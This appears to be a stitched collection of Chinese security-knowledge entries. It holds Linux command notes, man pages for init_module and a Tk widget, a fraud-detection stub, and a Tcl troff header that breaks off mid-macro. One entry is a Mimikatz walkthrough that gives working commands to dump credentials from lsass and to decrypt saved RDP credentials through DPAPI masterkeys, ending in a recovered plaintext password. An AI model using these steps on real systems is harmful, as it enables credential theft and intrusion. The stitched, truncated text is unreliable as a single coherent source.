的权限,也就是写权限,因此建立新文件时默认的权限为 -rw-rw-r--。 ### 目录的权限 文件名不是存储在一个文件的内容中,而是存储在一个文件所在的目录中。因此,拥有文件的 w 权限并不能对文件名进行修改。 目录存储文件列表,一个目录的权限也就是对其文件列表的权限。因此,目录的 r 权限表示可以读取文件列表;w 权限表示可以修改文件列表,具体来说,就是添加删除文件,对文件名进行修改;x 权限可以让该目录成为工作目录,x 权限是 r 和 w 权限的基础,如果不能使一个目录成为工作目录,也就没办法读取文件列表以及对文件列表进行修改了。 ### 链接 <div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/1e46fd03-0cda-4d60-9b1c-0c256edaf6b2.png" width="450px"> </div><br> ```html ## ln [-sf] source_filename dist_filename -s :默认是实体链接,加 -s 为符号链接 -f :如果目标文件存在时,先删除目标文件 ``` #### 1. 实体链接 在目录下创建一个条目,记录着文件名与 inode 编号,这个 inode 就是源文件的 inode。 删除任意一个条目,文件还是存在,只要引用数量不为 0。 有以下限制:不能跨越文件系统、不能对目录进行链接。 ```html ## ln /etc/crontab . ## ll -i /etc/crontab crontab 34474855 -rw-r--r--. 2 root root 451 Jun 10 2014 crontab 34474855 -rw-r--r--. 2 root root 451 Jun 10 2014 /etc/crontab ``` #### 2. 符号链接 符号链接文件保存着源文件所在的绝对路径,在读取时会定位到源文件上,可以理解为 Windows 的快捷方式。 当源文件被删除了,链接文件就打不开了。 因为记录的是路径,所以可以为目录建立符号链接。 ```html ## ll -i /etc/crontab /root/crontab2 34474855 -rw-r--r--. 2 root root 451 Jun 10 2014 /etc/crontab 53745909 lrwxrwxrwx. 1 root root 12 Jun 23 22:31 /root/crontab2 -> /etc/crontab ``` ### 获取文件内容 #### 1. cat 取得文件内容。 ```html ## cat [-AbEnTv] filename -n :打印出行号,连同空白行也会有行号,-b 不会 ``` #### 2. tac 是 cat 的反向操作,从最后一行开始打印。 #### 3. more 和 cat 不同的是它可以一页一页查看文件内容,比较适合大文件的查看。 #### 4. less 和 more 类似,但是多了一个向前翻页的功能。 #### 5. head 取得文件前几行。 ```html ## head [-n number] filename -n :后面接数字,代表显示几行的意思 ``` #### 6. tail 是 head 的反向操作,只是取得是后几行。 #### 7. od 以字符或者十六进制的形式显示二进制文件。 ### 指令与文件搜索 #### 1. which 指令搜索。 ```html ## which [-a] command -a :将所有指令列出,而不是只列第一个 ``` #### 2. whereis 文件搜索。速度比较快,因为它只搜索几个特定的目录。 ```html ## whereis [-bmsu] dirname/filename ``` #### 3. locate 文件搜索。可以用关键字或者正则表达式进行搜索。 locate 使用 /var/lib/mlocate/ 这个数据库来进行搜索,它存储在内存中,并且每天更新一次,所以无法用 locate 搜索新建的文件。可以使用 updatedb 来立即更新数据库。 ```html ## locate [-ir] keyword -r:正则表达式 ``` #### 4. find 文件搜索。可以使用文件的属性和权限进行搜索。 ```html ## find [basedir] [option] example: find . -name "shadow*" ``` **① 与时间有关的选项** ```html -mtime n :列出在 n 天前的那一天修改过内容的文件 -mtime +n :列出在 n 天之前 (不含 n 天本身) 修改过内容的文件 -mtime -n :列出在 n 天之内 (含 n 天本身) 修改过内容的文件 -newer file : 列出比 file 更新的文件 ``` +4、4 和 -4 的指示的时间范围如下: <div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/658fc5e7-79c0-4247-9445-d69bf194c539.png" width=""/> </div><br> **② 与文件拥有者和所属群组有关的选项** ```html -uid n -gid n -user name -group name -nouser :搜索拥有者不存在 /etc/passwd 的文件 -nogroup:搜索所属群组不存在于 /etc/group 的文件 ``` **③ 与文件权限和名称有关的选项** ```html -name filename -size [+-]SIZE:搜寻比 SIZE 还要大 (+) 或小 (-) 的文件。这个 SIZE 的规格有:c: 代表 byte,k: 代表 1024bytes。所以,要找比 50KB 还要大的文件,就是 -size +50k -type TYPE -perm mode :搜索权限等于 mode 的文件 -perm -mode :搜索权限包含 mode 的文件 -perm /mode :搜索权限包含任一 mode 的文件 ``` ## 六、压缩与打包 ### 压缩文件名 Linux 底下有很多压缩文件名,常见的如下: | 扩展名 | 压缩程序 | | -- | -- | | \*.Z | compress | |\*.zip | zip | |\*.gz | gzip| |\*.bz2 | bzip2 | |\*.xz | xz | |\*.tar | tar 程序打包的数据,没有经过压缩 | |\*.tar.gz | tar 程序打包的文件,经过 gzip 的压缩 | |\*.tar.bz2 | tar 程序打包的文件,经过 bzip2 的压缩 | |\*.tar.xz | tar 程序打包的文件,经过 xz 的压缩 | ### 压缩指令 #### 1. gzip gzip 是 Linux 使用最广的压缩指令,可以解开 compress、zip 与 gzip 所压缩的文件。 经过 gzip 压缩过,源文件就不存在了。 有 9 个不同的压缩等级可以使用。 可以使用 zcat、zmore、zless 来读取压缩文件的内容。 ```html $ gzip [-cdtv#] filename -c :将压缩的数据输出到屏幕上 -d :解压缩 -t :检验压缩文件是否出错 -v :显示压缩比等信息 -# : # 为数字的意思,代表压缩等级,数字越大压缩比越高,默认为 6 ``` #### 2. bzip2 提供比 gzip 更高的压缩比。 查看命令:bzcat、bzmore、bzless、bzgrep。 ```html $ bzip2 [-cdkzv#] filename -k :保留源文件 ``` #### 3. xz 提供比 bzip2 更佳的压缩比。 可以看到,gzip、bzip2、xz 的压缩比不断优化。不过要注意的是,压缩比越高,压缩的时间也越长。 查看命令:xzcat、xzmore、xzless、xzgrep。 ```html $ xz [-dtlkc#] filename ``` ### 打包 压缩指令只能对一个文件进行压缩,而打包能够将多个文件打包成一个大文件。tar 不仅可以用于打包,也可以使用 gzip、bzip2、xz 将打包文件进行压缩。 ```html $ tar [-z|-j|-J] [cv] [-f 新建的 tar 文件] filename... ==打包压缩 $ tar [-z|-j|-J] [tv] [-f 已有的 tar 文件] ==查看 $ tar [-z|-j|-J] [xv] [-f 已有的 tar 文件] [-C 目录] ==解压缩 -z :使用 zip; -j :使用 bzip2; -J :使用 xz; -c :新建打包文件; -t :查看打包文件里面有哪些文件; -x :解打包或解压缩的功能; -v :在压缩/解压缩的过程中,显示正在处理的文件名; -f : filename:要处理的文件; -C 目录 : 在特定目录解压缩。 ``` | 使用方式 | 命令 | | :---: | --- | | 打包压缩 | tar -jcv -f filename.tar.bz2 要被压缩的文件或目录名称 | | 查 看 | tar -jtv -f filename.tar.bz2 | | 解压缩 | tar -jxv -f filename.tar.bz2 -C 要解压缩的目录 | ## 七、Bash 可以通过 Shell 请求内核提供服务,Bash 正是 Shell 的一种。 ### 特性 - 命令历史:记录使用过的命令 - 命令与文件补全:快捷键:tab - 命名别名:例如 ll 是 ls -al 的别名 - shell scripts - 通配符:例如 ls -l /usr/bin/X\* 列出 /usr/bin 下面所有以 X 开头的文件 ### 变量操作 对一个变量赋值直接使用 =。 对变量取用需要在变量前加上 \$ ,也可以用 \${} 的形式; 输出变量使用 echo 命令。 ```bash $ x=abc $ echo $x $ echo ${x} ``` 变量内容如果有空格,必须使用双引号或者单引号。 - 双引号内的特殊字符可以保留原本特性,例如 x="lang is \$LANG",则 x 的值为 lang is zh_TW.UTF-8; - 单引号内的特殊字符就是特殊字符本身,例如 x='lang is \$LANG',则 x 的值为 lang is \$LANG。 可以使用 \`指令\` 或者 \$(指令) 的方式将指令的执行结果赋值给变量。例如 version=\$(uname -r),则 version 的值为 4.15.0-22-generic。 可以使用 export 命令将自定义变量转成环境变量,环境变量可以在子程序中使用,所谓子程序就是由当前 Bash 而产生的子 Bash。 Bash 的变量可以声明为数组和整数数字。注意数字类型没有浮点数。如果不进行声明,默认是字符串类型。变量的声明使用 declare 命令: ```html $ declare [-aixr] variable -a : 定义为数组类型 -i : 定义为整数类型 -x : 定义为环境变量 -r : 定义为 readonly 类型 ``` 使用 [ ] 来对数组进行索引操作: ```bash $ array[1]=a $ array[2]=b $ echo ${array[1]} ``` ### 指令搜索顺序 - 以绝对或相对路径来执行指令,例如 /bin/ls 或者 ./ls ; - 由别名找到该指令来执行; - 由 Bash 内置的指令来执行; - 按 \$PATH 变量指定的搜索路径的顺序找到第一个指令来执行。 ### 数据流重定向 重定向指的是使用文件代替标准输入、标准输出和标准错误输出。 | 1 | 代码 | 运算符 | | :---: | :---: | :---:| | 标准输入 (stdin) | 0 | \< 或 \<\< | | 标准输出 (stdout) | 1 | &gt; 或 \>\> | | 标准错误输出 (stderr) | 2 | 2\> 或 2\>\> | 其中,有一个箭头的表示以覆盖的方式重定向,而有两个箭头的表示以追加的方式重定向。 可以将不需要的标准输出以及标准错误输出重定向到 /dev/null,相当于扔进垃圾箱。 如果需要将标准输出以及标准错误输出同时重定向到一个文件,需要将某个输出转换为另一个输出,例如 2\>&1 表示将标准错误输出转换为标准输出。 ```bash $ find /home -name .bashrc > list 2>&1 ``` ## 八、管道指令 管道是将一个命令的标准输出作为另一个命令的标准输入,在数据需要经过多个步骤的处理之后才能得到我们想要的内容时就可以使用管道。 在命令之间使用 | 分隔各个管道命令。 ```bash $ ls -al /etc | less ``` ### 提取指令 cut 对数据进行切分,取出想要的部分。 切分过程一行一行地进行。 ```html $ cut -d :分隔符 -f :经过 -d 分隔后,使用 -f n 取出第 n 个区间 -c :以字符为单位取出区间 ``` 示例 1:last 显示登入者的信息,取出用户名。 ```html $ last root pts/1 192.168.201.101 Sat Feb 7 12:35 still logged in root pts/1 192.168.201.101 Fri Feb 6 12:13 - 18:46 (06:33) root pts/1 192.168.201.254 Thu Feb 5 22:37 - 23:53 (01:16) $ last | cut -d ' ' -f 1 ``` 示例 2:将 export 输出的信息,取出第 12 字符以后的所有字符串。 ```html $ export declare -x HISTCONTROL="ignoredups" declare -x HISTSIZE="1000" declare -x HOME="/home/dmtsai" declare -x HOSTNAME="study.centos.vbird" .....(其他省略)..... $ export | cut -c 12- ``` ### 排序指令 **sort** 用于排序。 ```html $ sort [-fbMnrtuk] [file or stdin] -f :忽略大小写 -b :忽略最前面的空格 -M :以月份的名字来排序,例如 JAN,DEC -n :使用数字 -r :反向排序 -u :相当于 unique,重复的内容只出现一次 -t :分隔符,默认为 tab -k :指定排序的区间 ``` 示例:/etc/passwd 文件内容以 : 来分隔,要求以第三列进行排序。 ```html $ cat /etc/passwd | sort -t ':' -k 3 root:x:0:0:root:/root:/bin/bash dmtsai:x:1000:1000:dmtsai:/home/dmtsai:/bin/bash alex:x:1001:1002::/home/alex:/bin/bash arod:x:1002:1003::/home/arod:/bin/bash ``` **uniq** 可以将重复的数据只取一个。 ```html $ uniq [-ic] -i :忽略大小写 -c :进行计数 ``` 示例:取得每个人的登录总次数 ```html $ last | cut -d ' ' -f 1 | sort | uniq -c 1 6 (unknown 47 dmtsai 4 reboot 7 root 1 wtmp ``` ### 双向输出重定向 输出重定向会将输出内容重定向到文件中,而 **tee** 不仅能够完成这个功能,还能保留屏幕上的输出。也就是说,使用 tee 指令,一个输出会同时传送到文件和屏幕上。 ```html $ tee [-a] file ``` ### 字符转换指令 **tr** 用来删除一行中的字符,或者对字符进行替换。 ```html $ tr [-ds] SET1 ... -d : 删除行中 SET1 这个字符串 ``` 示例,将 last 输出的信息所有小写转换为大写。 ```html $ last | tr '[a-z]' '[A-Z]' ``` **col** 将 tab 字符转为空格字符。 ```html $ col [-xb] -x : 将 tab 键转换成对等的空格键 ``` **expand** 将 tab 转换一定数量的空格,默认是 8 个。 ```html $ expand [-t] file -t :tab 转为空格的数量 ``` **join** 将有相同数据的那一行合并在一起。 ```html $ join [-ti12] file1 file2 -t :分隔符,默认为空格 -i :忽略大小写的差异 -1 :第一个文件所用的比较字段 -2 :第二个文件所用的比较字段 ``` **paste** 直接将两行粘贴在一起。 ```html $ paste [-d] file1 file2 -d :分隔符,默认为 tab ``` ### 分区指令 **split** 将一个文件划分成多个文件。 ```html $ split [-bl] file PREFIX -b :以大小来进行分区,可加单位,例如 b, k, m 等 -l :以行数来进行分区。 - PREFIX :分区文件的前导名称 ``` ## 九、正则表达式 ### grep g/re/p(globally search a regular expression and print),使用正则表示式进行全局查找并打印。 ```html $ grep [-acinv] [--color=auto] 搜寻字符串 filename -c : 统计匹配到行的个数 -i : 忽略大小写 -n : 输出行号 -v : 反向选择,也就是显示出没有 搜寻字符串 内容的那一行 --color=auto :找到的关键字加颜色显示 ``` 示例:把含有 the 字符串的行提取出来(注意默认会有 --color=auto 选项,因此以下内容在 Linux 中有颜色显示 the 字符串) ```html $ grep -n 'the' regular_express.txt 8:I can't finish the test. 12:the symbol '*' is represented as start. 15:You are the best is mean you are the no. 1. 16:The world Happy is the same with "glad". 18:google is the best tools for search keyword ``` 示例:正则表达式 a{m,n} 用来匹配字符 a m\~n 次,这里需要将 { 和 } 进行转义,因为它们在 shell 是有特殊意义的。 ```html $ grep -n 'a\{2,5\}' regular_express.txt ``` ### printf 用于格式化输出。它不属于管道命令,在给 printf 传数据时需要使用 $( ) 形式。 ```html $ printf '%10s %5i %5i %5i %8.2f \n' $(cat printf.txt) DmTsai 80 60 92 77.33 VBird 75 55 80 70.00 Ken 60 90 70 73.33 ``` ### awk 是由 Alfred Aho,Peter Weinberger 和 Brian Kernighan 创造,awk 这个名字就是这三个创始人名字的首字母。 awk 每次处理一行,处理的最小单位是字段,每个字段的命名方式为:\$n,n 为字段号,从 1 开始,\$0 表示一整行。 示例:取出最近五个登录用户的用户名和 IP。首先用 last -n 5 取出用最近五个登录用户的所有信息,可以看到用户名和 IP 分别在第 1 列和第 3 列,我们用 \$1 和 \$3 就能取出这两个字段,然后用 print 进行打印。 ```html $ last -n 5 dmtsai pts/0 192.168.1.100 Tue Jul 14 17:32 still logged in dmtsai pts/0 192.168.1.100 Thu Jul 9 23:36 - 02:58 (03:22) dmtsai pts/0 192.168.1.100 Thu Jul 9 17:23 - 23:36 (06:12) dmtsai pts/0 192.168.1.100 Thu Jul 9 08:02 - 08:17 (00:14) dmtsai tty1 Fri May 29 11:55 - 12:11 (00:15) ``` ```html $ last -n 5 | awk '{print $1 "\t" $3}' dmtsai 192.168.1.100 dmtsai 192.168.1.100 dmtsai 192.168.1.100 dmtsai 192.168.1.100 dmtsai Fri ``` 可以根据字段的某些条件进行匹配,例如匹配字段小于某个值的那一行数据。 ```html $ awk '条件类型 1 {动作 1} 条件类型 2 {动作 2} ...' filename ``` 示例:/etc/passwd 文件第三个字段为 UID,对 UID 小于 10 的数据进行处理。 ```text $ cat /etc/passwd | awk 'BEGIN {FS=":"} $3 < 10 {print $1 "\t " $3}' root 0 bin 1 daemon 2 ``` awk 变量: | 变量名称 | 代表意义 | | :--: | -- | | NF | 每一行拥有的字段总数 | | NR | 目前所处理的是第几行数据 | | FS | 目前的分隔字符,默认是空格键 | 示例:显示正在处理的行号以及每一行有多少字段 ```html $ last -n 5 | awk '{print $1 "\t lines: " NR "\t columns: " NF}' dmtsai lines: 1 columns: 10 dmtsai lines: 2 columns: 10 dmtsai lines: 3 columns: 10 dmtsai lines: 4 columns: 10 dmtsai lines: 5 columns: 9 ``` ## 十、进程管理 ### 查看进程 #### 1. ps 查看某个时间点的进程信息。 示例:查看自己的进程 ```sh ## ps -l ``` 示例:查看系统所有进程 ```sh ## ps aux ``` 示例:查看特定的进程 ```sh ## ps aux | grep threadx ``` #### 2. pstree 查看进程树。 示例:查看所有进程树 ```sh ## pstree -A ``` #### 3. top 实时显示进程信息。 示例:两秒钟刷新一次 ```sh ## top -d 2 ``` #### 4. netstat 查看占用端口的进程 示例:查看特定端口的进程 ```sh ## netstat -anp | grep port ``` ### 进程状态 | 状态 | 说明 | | :---: | --- | | R | running or runnable (on run queue)<br>正在执行或者可执行,此时进程位于执行队列中。| | D | uninterruptible sleep (usually I/O)<br>不可中断阻塞,通常为 IO 阻塞。 | | S | interruptible sleep (waiting for an event to complete) <br> 可中断阻塞,此时进程正在等待某个事件完成。| | Z | zombie (terminated but not reaped by its parent)<br>僵死,进程已经终止但是尚未被其父进程获取信息。| | T | stopped (either by a job control signal or because it is being traced) <br> 结束,进程既可以被作业控制信号结束,也可能是正在被追踪。| <br> <div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/2bab4127-3e7d-48cc-914e-436be859fb05.png" width="490px"/> </div><br> ### SIGCHLD 当一个子进程改变了它的状态时(停止运行,继续运行或者退出),有两件事会发生在父进程中: - 得到 SIGCHLD 信号; - waitpid() 或者 wait() 调用会返回。 其中子进程发送的 SIGCHLD 信号包含了子进程的信息,比如进程 ID、进程状态、进程使用 CPU 的时间等。 在子进程退出时,它的进程描述符不会立即释放,这是为了让父进程得到子进程信息,父进程通过 wait() 和 waitpid() 来获得一个已经退出的子进程的信息。 <div align="center"> <!-- <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/flow.png" width=""/> --> </div><br> ### wait() ```c pid_t wait(int *status) ``` 父进程调用 wait() 会一直阻塞,直到收到一个子进程退出的 SIGCHLD 信号,之后 wait() 函数会销毁子进程并返回。 如果成功,返回被收集的子进程的进程 ID;如果调用进程没有子进程,调用就会失败,此时返回 -1,同时 errno 被置为 ECHILD。 参数 status 用来保存被收集的子进程退出时的一些状态,如果对这个子进程是如何死掉的毫不在意,只想把这个子进程消灭掉,可以设置这个参数为 NULL。 ### waitpid() ```c pid_t waitpid(pid_t pid, int *status, int options) ``` 作用和 wait() 完全相同,但是多了两个可由用户控制的参数 pid 和 options。 pid 参数指示一个子进程的 ID,表示只关心这个子进程退出的 SIGCHLD 信号。如果 pid=-1 时,那么和 wait() 作用相同,都是关心所有子进程退出的 SIGCHLD 信号。 options 参数主要有 WNOHANG 和 WUNTRACED 两个选项,WNOHANG 可以使 waitpid() 调用变成非阻塞的,也就是说它会立即返回,父进程可以继续执行其它任务。 ### 孤儿进程 一个父进程退出,而它的一个或多个子进程还在运行,那么这些子进程将成为孤儿进程。 孤儿进程将被 init 进程(进程号为 1)所收养,并由 init 进程对它们完成状态收集工作。 由于孤儿进程会被 init 进程收养,所以孤儿进程不会对系统造成危害。 ### 僵尸进程 一个子进程的进程描述符在子进程退出时不会释放,只有当父进程通过 wait() 或 waitpid() 获取了子进程信息后才会释放。如果子进程退出,而父进程并没有调用 wait() 或 waitpid(),那么子进程的进程描述符仍然保存在系统中,这种进程称之为僵尸进程。 僵尸进程通过 ps 命令显示出来的状态为 Z(zombie)。 系统所能使用的进程号是有限的,如果产生大量僵尸进程,将因为没有可用的进程号而导致系统不能产生新的进程。 要消灭系统中大量的僵尸进程,只需要将其父进程杀死,此时僵尸进程就会变成孤儿进程,从而被 init 进程所收养,这样 init 进程就会释放所有的僵尸进程所占有的资源,从而结束僵尸进程。 ## 参考资料 - 鸟哥. 鸟 哥 的 Linux 私 房 菜 基 础 篇 第 三 版[J]. 2009. - [Linux 平台上的软件包管理](https://www.ibm.com/developerworks/cn/linux/l-cn-rpmdpkg/index.html) - [Linux 之守护进程、僵死进程与孤儿进程](http://liubigbin.github.io/2016/03/11/Linux-%E4%B9%8B%E5%AE%88%E6%8A%A4%E8%BF%9B%E7%A8%8B%E3%80%81%E5%83%B5%E6%AD%BB%E8%BF%9B%E7%A8%8B%E4%B8%8E%E5%AD%A4%E5%84%BF%E8%BF%9B%E7%A8%8B/) - [What is the difference between a symbolic link and a hard link?](https://stackoverflow.com/questions/185899/what-is-the-difference-between-a-symbolic-link-and-a-hard-link) - [Linux process states](https://idea.popcount.org/2012-12-11-linux-process-states/) - [GUID Partition Table](https://en.wikipedia.org/wiki/GUID_Partition_Table) - [详解 wait 和 waitpid 函数](https://blog.csdn.net/kevinhg/article/details/7001719) - [IDE、SATA、SCSI、SAS、FC、SSD 硬盘类型介绍](https://blog.csdn.net/tianlesoftware/article/details/6009110) - [Akai IB-301S SCSI Interface for S2800,S3000](http://www.mpchunter.com/s3000/akai-ib-301s-scsi-interface-for-s2800s3000/) - [Parallel ATA](https://en.wikipedia.org/wiki/Parallel_ATA) - [ADATA XPG SX900 256GB SATA 3 SSD Review – Expanded Capacity and SandForce Driven Speed](http://www.thessdreview.com/our-reviews/adata-xpg-sx900-256gb-sata-3-ssd-review-expanded-capacity-and-sandforce-driven-speed/4/) - [Decoding UCS Invicta – Part 1](https://blogs.cisco.com/datacenter/decoding-ucs-invicta-part-1) - [硬盘](https://zh.wikipedia.org/wiki/%E7%A1%AC%E7%9B%98) - [Difference between SAS and SATA](http://www.differencebetween.info/difference-between-sas-and-sata) - [BIOS](https://zh.wikipedia.org/wiki/BIOS) - [File system design case studies](https://www.cs.rutgers.edu/\~pxk/416/notes/13-fs-studies.html) - [Programming Project #4](https://classes.soe.ucsc.edu/cmps111/Fall08/proj4.shtml) - [FILE SYSTEM DESIGN](http://web.cs.ucla.edu/classes/fall14/cs111/scribe/11a/index.html)
sec-knowleage
# Mimikatz 家喻户晓的工具Mimikatz可以dump凭据,也就是hash,可以在gentilwiki的github主页找到最新的编译好的利用文件。 Mimikatz的运行需要管理员权限,它可以从administrator权限提升到system权限。 ``` mimikatz # privilege::debug Privilege '20' OK ``` ## Dumping creds from lsass ``` mimikatz # sekurlsa::logonpasswords ``` ## DPAPI方法 有些用户在进行3389连接的时候,会选择把密码保存在本地的选项。 凭据通常存储在以下两个目录中的文件中: ``` dir /a C:\Users\username\AppData\Roaming\Microsoft\Credentials C:\Users\username\AppData\Local\Microsoft\Credentials ``` 如果两个文件夹都是空的,那么凭证可能不会保存在凭证管理器中。这些文件通常存储为32个字符全部大写字母的数字字符串,类似于:`0DCF46D87F2DCE439DC47AA5F9267462`。 获得凭据文件的文件名和路径后,用mimikatz执行: ``` mimikatz dpapi::cred /in:C:\Users\username\AppData\Local\Microsoft\Credentials\0DCF46D87F2DCE439DC47AA5F9267462 //dump我们想要解密的凭据blob以及解密所需的masterkey的GUID。 ``` SYSTEM可以dump所有的masterkeys: ``` !sekurlsa::dpapi ``` 在上一步中,你应该获得了一个129字符的字符串,这是作为与找到的GUID相关联的masterkey。 ``` GUID: {6515c6ef-60cd-4563-a3d5-3d70a6bc699} masterkey: 76081ac6e809573b4dfa1a7a8eac3ae0106aa3f4d283fc3d6cf114a6285b582d4df53dc0e30b64c318e473bce49adabb73ad8cccd8bf4d7d10f44f4d4e48cf04 ``` 继续使用masterkey解密凭据。 ``` dpapi::cred /in:C:\Users\username\AppData\Local\Microsoft\Credentials\0DCF46D87F2DCE439DC47AA5F9267462/masterkey:76081ac6e809573b4dfa1a7a8eac3ae0106aa3f4d283fc3d6cf114a6285b582d4df53dc0e30b64c318e473bce49adabb73ad8cccd8bf4d7d10f44f4d4e48cf04 ``` 会回显出用户名和密码: ``` UserName : LAN\username_adm CredentialBlob : Sup3rAw3s0m3Passw0rd! ``` ``` 参考链接:https://github.com/gentilkiwi/mimikatz/wiki/module-~-dpapi https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials https://rastamouse.me/2017/08/jumping-network-segregation-with-rdp/​ ```
sec-knowleage
# [TODO]算法层面上的对抗分析 ## 1. 团伙识别 黑灰产团伙的识别,可以从行为出发,而行为的角度上来看,可以尝试识别异常的行为模式,因为通常来说正常用户是分散的,而可疑的行为通常是紧密的。 ### 1.1 基于图的挖掘算法 - Louvain - FRAUDAR - CatchSync
sec-knowleage
.TH init_module "" .SH NAME init_module - 初始化一条可加载模块的记录. .SH 总览 .B #include <linux/module.h> .sp int init_module(const char *name, struct module *image); .SH 描述 init_module加载已被重定位的模块映象到内核空间,并运行模块的初始化函数. 模块映象以module结构开始,紧跟着代码和数据,module定义如下: struct module { unsigned long size_of_struct; /* module结构的大小 */ struct module *next; /*指向下一个module结构 */ const char *name; /* 模块名字 */ unsigned long size; long usecount; /* 使用计数 */ unsigned long flags; /* 模块当前状态标志 */ unsigned int nsyms; unsigned int ndeps; /* 正使用模块的模块个数 */ struct module_symbol *syms; struct module_ref *deps; struct module_ref *refs; int (*init)(void); /* 模块的初始化函数指针 */ void (*cleanup)(void); /*模块的清除函数指针 */ const struct exception_table_entry *ex_table_start; const struct exception_table_entry *ex_table_end; #ifdef __alpha__ unsigned long gp; #endif }; 除了next和refs外,所有的指针被期望指在模块体内, 该系统调用只对超级用户开放. .SH 返回值 成功时返回0,错误时返回 -1,errno被相应设置. .SH 错误 .TP EPERM 用户不是超级用户. .TP ENOENT name指定的模块不存在. .TP EINVAL .TP EBUSY 模块的初始化函数失败. .TP EFAULT name或image越出了程序可访问的地址空间. .SH "雷勇" <nsinit@263.net>
sec-knowleage
.TH LabelFrame 3tk "tcllib - BWidget" .SH NAME .B LabelFrame - 有一个标签的框架. .SH 创建 CREATION .B LabelFrame pathName ?option value...? .SH 描述 DESCRIPTION LabelFrame 使用户能建立带有可定位在任何一边的一个标签的框架。ComboBox 和 SpinBox 使用了 LabelFrame。 .SH 组件特有选项 WIDGET-SPECIFIC OPTIONS .TP -side (read-only) 指定把标签定位于相对于用户框架的: top、bottom、left 或 right。 .SH 组件命令 .TP LabelFrame::align ?arg...? 这个命令通过设置用 args 给出的类 LabelFrame (或衍生(derive)类)的所有组件的标签的宽度为最大的那个宽度 + 1 来对齐(align)这些标签。 .TP pathName cget option 返回用 option 给出的配置选项的当前值。Option 可以是能被建立命令接受的任何值。 .TP pathName configure ?option? ?value option value ...? 查询或修改这个组件的配置选项。如果未指定 option ,则返回描述 pathName 的所有可获得的选项的一个列表。如果指定了不带 value 的 option,则这个命令返回描述这个指名的 option 的一个列表(这个列表与未指定 option 所返回的值的相应的子集是一样的)。如果指定了一个或多个选项-值 对,则这个命令把给定的组件选项修改为给定的值;在这种情况下这个命令返回一个空串。Option 可以是能被建立命令接受的任何值。只读选项不可修改。 .TP pathName getframe 返回用户可以建立任何其他组件的那个框架。 .SH "[中文版维护人]" .B 寒蝉退士 .SH "[中文版最新更新]" .B 2001/05/06 .SH "《中国 Linux 论坛 man 手册页翻译计划》:" .BI http://cmpp.linuxforum.net
sec-knowleage
'\" '\" Copyright (c) 1990-1994 The Regents of the University of California. '\" Copyright (c) 1994-1996 Sun Microsystems, Inc. '\" '\" See the file "license.terms" for information on usage and redistribution '\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\" '\" RCS: @(#) $Id: send.n,v 1.2 2003/11/24 05:10:00 bbbush Exp $ '\" '\" The definitions below are for supplemental macros used in Tcl/Tk '\" manual entries. '\" '\" .AP type name in/out ?indent? '\" Start paragraph describing an argument to a library procedure. '\" type is type of argument (int, etc.), in/out is either "in", "out", '\" or "in/out" to describe whether procedure reads or modifies arg, '\" and indent is equivalent to second arg of .IP (shouldn't ever be '\" needed; use .AS below instead) '\" '\" .AS ?type? ?name? '\" Give maximum sizes of arguments for setting tab stops. Type and '\" name are examples of largest possible arguments that will be passed '\" to .AP later. If args are omitted, default tab stops are used. '\" '\" .BS '\" Start box enclosure. From here until next .BE, everything will be '\" enclosed in one large box. '\" '\" .BE '\" End of box enclosure. '\" '\" .CS '\" Begin code excerpt. '\" '\" .CE '\" End code excerpt. '\" '\" .VS ?version? ?br? '\" Begin vertical sidebar, for use in marking newly-changed parts '\" of man pages. The first argument is ignored and used for recording '\" the version when the .VS was added, so that the sidebars can be '\" found and removed when they reach a certain age. If another argument '\" is present, then a line break is forced before starting the sidebar. '\" '\" .VE '\" End of vertical sidebar. '\" '\" .DS '\" Begin an indented unfilled display. '\" '\" .DE '\" End of indented unfilled display. '\" '\" .SO '\" Start of list of standard options for a Tk widget. The '\" options follow on successive lines, in four columns separated '\" by tabs. '\" '\" .SE '\" End of list of standard options for a Tk widget. '\" '\" .OP cmdName dbName dbClass '\" Start of description of a specific option. cmdName gives the '\" option's name as specified in the class command, dbName gives '\" the option's name in the option database, and dbClass gives '\" the option's class in the option database. '\" '\" .UL arg1 arg2 '\" Print arg1 underlined, then print arg2 normally. '\" '\" RCS: @(#) $Id: send.n,v 1.2 2003/11/24 05:10:00 bbbush Exp $ '\" '\" # Set up traps and other miscellaneous stuff for Tcl/Tk man pages. .if t .wh -1.3i ^B .nr ^l \n(.l .ad b '\" # Start an argument description .de AP .ie !"\\$4"" .TP \\$4 .el \{\ . ie !"\\$2"" .TP \\n()Cu . el .TP 15 .\} .ta \\n()Au \\n()Bu .ie !"\\$3"" \{\ \&\\$1 \\fI\\$2\\fP (\\$3) .\".b .\} .el \{\ .br .ie !"\\$2"" \{\ \&\\$1 \\fI\\$2\\fP .\} .el \{\ \&\\fI\\$1\\fP .\} .\} .. '\" # define tabbing values for .AP .de AS .nr )A 10n .if !"\\$1"" .nr )A \\w'\\$1'u+3n .nr )B \\n()Au+15n .\" .if !"\\$2"" .nr )B \\w'\\$2'u+\\n()Au+3n .nr )C \\n()Bu+\\w'(in/out)'u+2n .. .AS Tcl_Interp Tcl_CreateInterp in/out '\" # BS - start boxed text '\" # ^y = starting y location '\" # ^b = 1 .de BS .br .mk ^y .nr ^b 1u .if n .nf .if n .ti 0 .if n \l'\\n(.lu\(ul' .if n .fi .. '\" # BE - end boxed text (draw box now) .de BE .nf .ti 0 .mk ^t .ie n \l'\\n(^lu\(ul' .el \{\ .\" Draw four-sided box normally, but don't draw top of .\" box if the box started on an earlier page. .ie !\\n(^b-1 \{\ \h'-1.5n'\L'|\\n(^yu-1v'\l'\\n(^lu+3n\(ul'\L'\\n(^tu+1v-\\n(^yu'\l'|0u-1.5n\(ul' .\} .el \}\ \h'-1.5n'\L'|\\n(^yu-1v'\h'\\n(^lu+3n'\L'\\n(^tu+1v-\\n(^yu'\l'|0u-1.5n\(ul' .\} .\} .fi .br .nr ^b 0 .. '\" # VS - start vertical sidebar '\" # ^Y = starting y location '\" # ^v = 1 (for troff; for nroff this doesn't matter) .de VS .if !"\\$2"" .br .mk ^Y .ie n 'mc \s12\(br\s0 .el .nr ^v 1u .. '\" # VE - end of vertical sidebar .de VE .ie n 'mc .el \{\ .ev 2 .nf .ti 0 .mk ^t 